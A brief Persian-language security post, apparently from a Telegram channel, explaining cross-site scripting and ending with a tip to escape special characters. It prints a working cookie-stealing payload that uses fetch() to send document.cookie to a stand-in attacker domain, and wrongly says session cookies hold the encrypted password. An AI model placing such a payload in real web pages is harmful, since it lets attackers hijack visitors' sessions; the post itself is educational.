یک آسیبپذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنلهای مدیریت در سراسر جهان راه میدهد.
🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا میکند که <script> را فیلتر نمیکند. کد خود را در آن قرار میدهد. قربانی صفحه را باز میکند — کد اجرا میشود.
مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):
<script>
fetch('http://хакер.ру/steal?cookie=' + document.cookie);
</script>
حالا هکر جلسه قربانی را دارد. کوکی را در مرورگر قرار میدهد — و بدون رمز عبور با حساب او وارد میشود.
🟢 حفاظت:
- کاراکترهای خاص را بررسی کنید (htmlspecialchars)
🛡@ir_c_a